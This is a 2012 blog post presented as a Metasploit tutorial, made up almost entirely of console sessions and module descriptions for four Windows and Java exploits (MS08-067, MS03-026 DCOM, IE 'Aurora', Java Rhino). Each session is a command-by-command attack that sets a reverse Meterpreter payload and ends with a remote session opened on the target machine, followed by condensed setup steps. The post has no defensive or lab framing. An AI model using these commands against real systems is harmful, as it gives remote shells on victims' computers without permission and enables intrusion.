Friday 13 April 2012

[TuT] Metasploit Ultimate [TuT]☆

[Image: VZySS.jpg]
[Image: JYUpu.jpg]
More info:
Code:
Description:
  This module exploits a parsing flaw in the path canonicalization
  code of NetAPI32.dll through the Server Service. This module is
  capable of bypassing NX on some operating systems and service packs.
  The correct target must be used to prevent the Server Service (along
  with a dozen others in the same process) from crashing. Windows XP
  targets seem to handle multiple successful exploitation events, but
  2003 targets will often crash or hang on subsequent attempts. This
  is just the first version of this module, full support for NX bypass
  on 2003, along with other platforms, is still in development.

  Name: Microsoft Server Service Relative Path Stack Corruption
  Module: exploit/windows/smb/ms08_067_netapi
    Version: 14319
   Platform: Windows
Privileged: Yes
    License: Metasploit Framework License (BSD)
  Rank: Great

Provided by:
  hdm <hdm@metasploit.com>
  Brett Moore <brett.moore@insomniasec.com>
  staylor
  jduck <jduck@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic Targeting
  1   Windows 2000 Universal
  10  Windows 2003 SP1 Japanese (NO NX)
  11  Windows 2003 SP2 English (NO NX)
  12  Windows 2003 SP2 English (NX)
  13  Windows 2003 SP2 German (NO NX)
  14  Windows 2003 SP2 German (NX)
  15  Windows XP SP2 Arabic (NX)
  16  Windows XP SP2 Chinese - Traditional / Taiwan (NX)
  17  Windows XP SP2 Chinese - Simplified (NX)
  18  Windows XP SP2 Chinese - Traditional (NX)
  19  Windows XP SP2 Czech (NX)
  2   Windows XP SP0/SP1 Universal
  20  Windows XP SP2 Danish (NX)
  21  Windows XP SP2 German (NX)
  22  Windows XP SP2 Greek (NX)
  23  Windows XP SP2 Spanish (NX)
  24  Windows XP SP2 Finnish (NX)
  25  Windows XP SP2 French (NX)
  26  Windows XP SP2 Hebrew (NX)
  27  Windows XP SP2 Hungarian (NX)
  28  Windows XP SP2 Italian (NX)
  29  Windows XP SP2 Japanese (NX)
  3   Windows XP SP2 English (AlwaysOn NX)
  30  Windows XP SP2 Korean (NX)
  31  Windows XP SP2 Dutch (NX)
  32  Windows XP SP2 Norwegian (NX)
  33  Windows XP SP2 Polish (NX)
  34  Windows XP SP2 Portuguese - Brazilian (NX)
  35  Windows XP SP2 Portuguese (NX)
  36  Windows XP SP2 Russian (NX)
  37  Windows XP SP2 Swedish (NX)
  38  Windows XP SP2 Turkish (NX)
  39  Windows XP SP3 Arabic (NX)
  4   Windows XP SP2 English (NX)
  40  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
  41  Windows XP SP3 Chinese - Simplified (NX)
  42  Windows XP SP3 Chinese - Traditional (NX)
  43  Windows XP SP3 Czech (NX)
  44  Windows XP SP3 Danish (NX)
  45  Windows XP SP3 German (NX)
  46  Windows XP SP3 Greek (NX)
  47  Windows XP SP3 Spanish (NX)
  48  Windows XP SP3 Finnish (NX)
  49  Windows XP SP3 French (NX)
  5   Windows XP SP3 English (AlwaysOn NX)
  50  Windows XP SP3 Hebrew (NX)
  51  Windows XP SP3 Hungarian (NX)
  52  Windows XP SP3 Italian (NX)
  53  Windows XP SP3 Japanese (NX)
  54  Windows XP SP3 Korean (NX)
  55  Windows XP SP3 Dutch (NX)
  56  Windows XP SP3 Norwegian (NX)
  57  Windows XP SP3 Polish (NX)
  58  Windows XP SP3 Portuguese - Brazilian (NX)
  59  Windows XP SP3 Portuguese (NX)
  6   Windows XP SP3 English (NX)
  60  Windows XP SP3 Russian (NX)
  61  Windows XP SP3 Swedish (NX)
  62  Windows XP SP3 Turkish (NX)
  63  Windows 2003 SP2 Japanese (NO NX)
  7   Windows 2003 SP0 Universal
  8   Windows 2003 SP1 English (NO NX)
  9   Windows 2003 SP1 English (NX)

Basic options:
  Name  Current Setting  Required  Description
  ----  --  --  --
  RHOST  yes  The target address
  RPORT    445    yes  Set the SMB service port
  SMBPIPE  BROWSER    yes  The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 400
  Avoid: 8 characters

Example:
Code:
II    dTb.dTb  _.---._
  II  4'  v  'B   .'"".'/|`.""'.
  II  6.  .P  :  .' / |  `.  :
  II  'T;. .;P'  '.'  /  |    `.'
  II  'T; ;P'    `. /   |    .'
II  'YvP'  `-.__|__.-'

I love shells --egypt

  =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 796 exploits - 435 auxiliary - 131 post
+ -- --=[ 242 payloads - 27 encoders - 8 nops
  =[ svn r14663 updated today (2012.01.31)

msf > use windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
smsf  exploit(ms08_067_netapi) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf  exploit(ms08_067_netapi) > set lport 4444
lport => 4444
msf  exploit(ms08_067_netapi) > set rhost 192.168.2.105
rhost => 192.168.2.105
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Unknown
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:445)
[Image: XlPRp.jpg]
Dcerpc Example:
Code:
msf > use exploit/windows/dcerpc/ms03_026_dcom

msf  exploit(ms03_026_dcom) > set rhost 192.168.2.105

rhost => 192.168.2.105
msf 
exploit(ms03_026_dcom) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf  exploit(ms03_026_dcom) > set lport 4443

lport => 4443

msf  exploit(ms03_026_dcom) > set lhost 192.168.2.103

lhost => 192.168.2.103

msf  exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on 192.168.2.103:4443

[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...

[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135] ...

[*] Sending exploit ...

[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012
Aurora Example:

Code:
msf > search aurora

Matching Modules
==

   Name  Disclosure Date  Rank    Description
   ----  --  ----    --
   exploit/windows/browser/ms10_002_aurora  2010-01-14  normal  Internet Explorer "Aurora" Memory Corruption

msf > use exploit/windows/browser/ms10_002_aurora
msf  exploit(ms10_002_aurora) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms10_002_aurora) > set lhost 192.168.2.103
lhost => 192.168.2.103
smsf  exploit(ms10_002_aurora) > set lport 4444
lport => 4444
msf  exploit(ms10_002_aurora) > set srvport 80
srvport => 80
msf  exploit(ms10_002_aurora) > set srvhost 192.168.2.103
srvhost => 192.168.2.103
msf  exploit(ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name  Current Setting  Required  Description
   ----  --  --  --
   SRVHOST  192.168.2.103    yes  The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80  yes  The local port to listen on.
   SSL  false    no  Negotiate SSL for incoming connections
   SSLCert    no  Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3  no  Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH    no  The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name  Current Setting  Required  Description
   ----  --  --  --
   EXITFUNC  process    yes  Exit technique: seh, thread, none, process
   LHOST  192.168.2.103    yes  The listen address
   LPORT  4444  yes  The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf  exploit(ms10_002_aurora) > set uripath /
uripath => /
msf  exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.2.103:4444
[*] Using URL: http://192.168.2.103:80/
[*] Server started.
msf  exploit(ms10_002_aurora) > [*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.2.105
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012
Aurora More Info:
Info:
Code:
Name: Internet Explorer "Aurora" Memory Corruption
  Module: exploit/windows/browser/ms10_002_aurora
    Version: 14034
   Platform: Windows
Privileged: No
    License: Metasploit Framework License (BSD)
  Rank: Normal

Provided by:
  unknown
  hdm <hdm@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name  Current Setting  Required  Description
  ----  --  --  --
  SRVHOST  0.0.0.0    yes  The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT  8080  yes  The local port to listen on.
  SSL  false    no  Negotiate SSL for incoming connections
  SSLCert    no  Path to a custom SSL certificate (default is randomly generated)
  SSLVersion  SSL3  no  Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH    no  The URI to use for this exploit (default is random)

Payload information:
  Space: 1000
  Avoid: 1 characters

Description:
  This module exploits a memory corruption flaw in Internet Explorer.
  This flaw was found in the wild and was a key component of the
  "Operation Aurora" attacks that lead to the compromise of a number
  of high profile companies. The exploit code is a direct port of the
  public sample published to the Wepawet malware analysis site. The
  technique used by this module is currently identical to the public
  sample, as such, only Internet Explorer 6 can be reliably exploited.

[Image: pDKI0.jpg]

Java Rhino Example:

Code:
II    dTb.dTb  _.---._
  II  4'  v  'B   .'"".'/|`.""'.
  II  6.  .P  :  .' / |  `.  :
  II  'T;. .;P'  '.'  /  |    `.'
  II  'T; ;P'    `. /   |    .'
II  'YvP'  `-.__|__.-'

I love shells --egypt

  =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 796 exploits - 435 auxiliary - 131 post
+ -- --=[ 242 payloads - 27 encoders - 8 nops
  =[ svn r14663 updated today (2012.01.31)

msf > use exploit/multi/browser/java_rhino
msf  exploit(java_rhino) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
smsf  exploit(java_rhino) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf  exploit(java_rhino) > set lport 4444
lport => 4444
smsf  exploit(java_rhino) > set uripath /
uripath => /
msf  exploit(java_rhino) > set srvhost 192.168.2.103
srvhost => 192.168.2.103
msf  exploit(java_rhino) > show options

Module options (exploit/multi/browser/java_rhino):

   Name  Current Setting  Required  Description
   ----  --  --  --
   SRVHOST  192.168.2.103    yes  The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080  yes  The local port to listen on.
   SSL  false    no  Negotiate SSL for incoming connections
   SSLCert    no  Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3  no  Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH  /    no  The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name  Current Setting  Required  Description
   ----  --  --  --
   EXITFUNC  process    yes  Exit technique: seh, thread, none, process
   LHOST  192.168.2.103    yes  The listen address
   LPORT  4444  yes  The listen port

Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)

msf  exploit(java_rhino) > set srvport 80
srvport => 80
msf  exploit(java_rhino) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.2.103:4444
[*] Using URL: http://192.168.2.103:80/
[*] Server started.
msf  exploit(java_rhino) > [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 192.168.2.100:50563...
[*] Sending Applet.jar to 192.168.2.100:50564...
[*] Sending Applet.jar to 192.168.2.100:50564...
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012

Java Rhino More Info:
Code:
Name: Java Applet Rhino Script Engine Remote Code Execution
  Module: exploit/multi/browser/java_rhino
    Version: 0
   Platform: Java, Windows, Linux
Privileged: No
    License: Metasploit Framework License (BSD)
  Rank: Excellent

Provided by:
  Michael Schierl
  juan vazquez
  Edward D. Teach <teach@consortium-of-pwners.net>
  sinn3r <sinn3r@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Generic (Java Payload)
  1   Windows Universal
  2   Apple OSX
  3   Linux x86

Basic options:
  Name  Current Setting  Required  Description
  ----  --  --  --
  SRVHOST  0.0.0.0    yes  The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT  8080  yes  The local port to listen on.
  SSL  false    no  Negotiate SSL for incoming connections
  SSLCert    no  Path to a custom SSL certificate (default is randomly generated)
  SSLVersion  SSL3  no  Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH    no  The URI to use for this exploit (default is random)

Payload information:
  Space: 20480
  Avoid: 0 characters

Description:
  This module exploits a vulnerability in the Rhino Script Engine that
  can be used by a Java Applet to run arbitrary Java code outside of
  the sandbox. The vulnerability affects version 7 and version 6
  update 27 and earlier, and should work on any browser that supports
  Java (for example: IE, Firefox, Google Chrome, etc)

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2011-3544
  http://www.osvdb.org/76500
  http://www.zerodayinitiative.com/advisories/ZDI-11-305/
  http://schierlm.users.sourceforge.net/CVE-2011-3544.html

Okay so this needs settings similar to aurora. So let's chose java rhino:
Code:
use exploit/multi/browser/java_rhino
Now set payload:
Code:
set payload windows/meterpreter/reverse_tcp
Input Lport, Lhost, and srvhost. Remember, Srvhost and Lhost should match:
Code:
set lhost 192.168.2.103
set lport 4444
set srvhost 192.168.2.103
[Image: JjRp4.jpg]
[Image: 9OtxD.jpg]

0 comments:

Post a Comment

CEX.io